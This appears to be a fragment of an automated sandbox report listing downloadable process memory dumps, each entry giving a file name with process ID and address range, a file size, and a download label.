memory/4604-153-0x00007FF606110000-0x00007FF606932000-memory.dmp

Filesize
8.1MB

Download
memory/4604-143-0x000001A8000A0000-0x000001A8000C7000-memory.dmp

Filesize
156KB

Download
memory/4604-144-0x00007FF606276000-0x00007FF6064DC000-memory.dmp

Filesize
2.4MB

Download
memory/4604-248-0x00007FF606110000-0x00007FF606932000-memory.dmp

Filesize
8.1MB

Download
memory/4816-1211-0x0000000000400000-0x00000000007FF000-memory.dmp

Filesize
4.0MB

Download
memory/4816-496-0x0000000000400000-0x00000000007FF000-memory.dmp

Filesize
4.0MB

Download
memory/5084-2124-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5084-2122-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5168-3088-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5168-3090-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5416-2729-0x0000000005560000-0x00000000055AC000-memory.dmp

Filesize
304KB

Download
memory/5416-2728-0x0000000004F00000-0x0000000005254000-memory.dmp

Filesize
3.3MB

Download
memory/5476-3206-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5476-3204-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5548-2191-0x0000000004720000-0x0000000004A74000-memory.dmp

Filesize
3.3MB

Download
memory/5548-2192-0x0000000004EE0000-0x0000000004F2C000-memory.dmp

Filesize
304KB

Download
memory/5916-3175-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5916-3177-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5952-3148-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/5952-3146-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/6128-3233-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download
memory/6128-3235-0x0000000000640000-0x0000000000B00000-memory.dmp

Filesize
4.8MB

Download